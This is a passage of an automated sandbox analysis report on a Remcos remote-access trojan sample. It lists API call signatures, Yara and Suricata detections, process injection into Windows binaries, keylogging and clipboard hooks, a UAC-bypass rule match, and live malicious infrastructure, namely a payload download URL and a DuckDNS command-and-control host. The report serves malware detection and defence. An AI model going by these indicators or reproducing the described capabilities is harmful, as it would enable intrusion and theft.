Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0300928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_030096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0300BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_03019B86 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_03008847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_03007877 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0304E8F9 FindFirstFileExA
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0300BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F97CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49706 -> 192.161.184.44:2468
                    Source: Malware configuration extractorURLs: https://maan2u.com/doc/233_Qzzgbhhaaml
                    Source: Malware configuration extractorURLs: apostlejob2.duckdns.org
                    Source: unknownDNS query: name: apostlejob2.duckdns.org
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290E4B8 InternetCheckConnectionA,0_2_0290E4B8
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: TMVADS-APTM-VADSDCHostingMY TMVADS-APTM-VADSDCHostingMY
                    Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49707 -> 178.237.33.50:80
                    Source: global trafficHTTP traffic detected: GET /doc/233_Qzzgbhhaaml HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: maan2u.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FAB411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,7_2_02FAB411
                    Source: global trafficHTTP traffic detected: GET /doc/233_Qzzgbhhaaml HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: maan2u.com
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: maan2u.com
                    Source: global trafficDNS traffic detected: DNS query: apostlejob2.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: SndVol.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp(
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpJ
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                    Source: colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpW
                    Source: colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl#
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                    Source: XjPA2pnUhC.exe, XjPA2pnUhC.exe, 00000000.00000002.2130796963.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2116974207.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maan2u.com/
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000028C3000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2116974207.0000000000608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maan2u.com/doc/233_Qzzgbhhaaml
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2116974207.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maan2u.com:443/doc/233_Qzzgbhhaaml
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownHTTPS traffic detected: 112.137.173.77:443 -> 192.168.2.5:49705 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9A2F3 SetWindowsHookExA 0000000D,02F9A2DF,000000007_2_02F9A2F3
                    Source: C:\Windows\SysWOW64\colorcpl.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\colorcpl.exe
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9B749 OpenClipboard,GetClipboardData,CloseClipboard,7_2_02F9B749
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FA68FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_02FA68FC
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028968FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_2_028968FC
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_030168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_030168FC
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9B749 OpenClipboard,GetClipboardData,CloseClipboard,7_2_02F9B749
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,7_2_02F9A41B
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTR

                    E-Banking Fraud

                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510318610.0000000000CFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2251996048.000000001F0E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2330151215.000000002B797000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FACA73 SystemParametersInfoW,7_2_02FACA73
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0289CA73 SystemParametersInfoW,10_2_0289CA73
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0301CA73 SystemParametersInfoW,12_2_0301CA73

                    System Summary

                    Source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Windows\SysWOW64\colorcpl.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02908730 NtQueueApcThread,0_2_02908730
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02907A2C NtAllocateVirtualMemory,0_2_02907A2C
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0290DC8C
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0290DC04
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0290DD70
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02907D78 NtWriteVirtualMemory,0_2_02907D78
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02908D70 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02908D70
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02908D6E GetThreadContext,SetThreadContext,NtResumeThread,0_2_02908D6E
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02907A2A NtAllocateVirtualMemory,0_2_02907A2A
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0290DBB0
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028C8730 NtQueueApcThread,9_2_028C8730
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028C7A2C NtAllocateVirtualMemory,9_2_028C7A2C
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028C7D78 NtWriteVirtualMemory,9_2_028C7D78
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028CDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,9_2_028CDD70
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028C7A2A NtAllocateVirtualMemory,9_2_028C7A2A
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028CDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_028CDBB0
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028CDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,9_2_028CDC8C
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028CDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_028CDC04
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028C8D6E GetThreadContext,SetThreadContext,NtResumeThread,9_2_028C8D6E
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028C8D70 GetThreadContext,SetThreadContext,NtResumeThread,9_2_028C8D70
